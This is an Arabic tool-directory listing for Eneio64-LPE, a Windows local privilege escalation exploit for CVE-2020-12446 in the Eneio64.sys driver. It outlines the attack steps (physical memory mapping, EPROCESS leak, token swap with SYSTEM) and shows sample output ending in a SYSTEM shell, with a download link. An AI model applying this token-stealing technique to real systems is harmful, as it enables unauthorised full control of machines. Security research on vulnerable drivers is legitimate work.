Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
Eneio64-LPE — استغلال لـ CVE-2020-12446 Eneio64.sys. يستخدم superfetch لترجمة العناوين. | Kitploit
أدوات/GitHubGitHub/s1lkys/eneio64-lpe
تصعيد الامتيازاتالاستغلالالتعلم والتعليماستغلال الملفات الثنائية
GitHubs1lkys/eneio64-lpe

Eneio64-LPE

استغلال لـ CVE-2020-12446 Eneio64.sys. يستخدم superfetch لترجمة العناوين.

عرض المستودع
36منذ 6 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
  1. يفتح مقبضًا للبرنامج التشغيل الضعيف
  2. يعيّن الذاكرة الفعلية في مساحة المستخدم
  3. يفتح مقبضًا لعملية النظام (System)
  4. يستعلم جدول SystemHandleInformation للعملية الحالية للحصول على مقبض النظام المسرب، مما يكشف عنوان EPROCESS الخاص به.
  5. يتنقل عبر الروابط النشطة للعمليات (ActiveProcessLinks) في EPROCESS للنظام حتى يعثر على PID العملية الحالية.
  6. يصحح رمز (Token) العملية الحالية باستخدام رمز عملية النظام
  7. يطلق عملية powershell جديدة.

يستخدم طريقة superfetch لتحويل العناوين الافتراضية إلى فيزيائية بدلاً من تسريب CR3 والتنقل في جداول الصفحات.

تم اختباره على Win11 21H2

root@kitploit:~
C:\Users\Public>.\Eneio64-LPE.exe
[+] Total physical memory: ~0x7fef2000 bytes
[+] Mapped physical memory at 000002A3A4FC0000
[+] Leaking System EPROCESS
[+] Opened handle to SYSTEM process (PID 4)
>    Current PID:  3932
>    Handle value: 0x5c
[+] Querying SystemHandleInformation table of current process
[+] Handle table queried successfully
>    Buffer size:    1048576 bytes
>    Resize rounds:  15
>    Total handles:  29211
[+] Searching for handle 0x5c in handle table
[+] Match found at index 29183 / 29211
>    PID:                      3932
>    Handle:                   0x5c
>    Object (System EPROCESS): 0xffff858ca1885040
[+] Searching for current process token. Walking ActiveProcessLinks from System Flink (System EPROCESS + 0x448) to current PID
[+] Next Flink addr - 0x448 = Next EPROCESS
[+] Found current process (PID 3932) token at [0x72cd25f8]
[+] Patching current token with SYSTEM token
[!] ==== Flink addr of current PID - EPROCESS ActiveProcessLinks Offset (0x448) + EPROCESS Token Offset (0x4B8) = Current Token ====
[+] Token replaced.
Microsoft Windows [Version 10.0.20348.2849]
(c) Microsoft Corporation. All rights reserved.

C:\Users\Public>whoami
nt authority\system

للاستخدام التعليمي فقط!

تنزيل الأداة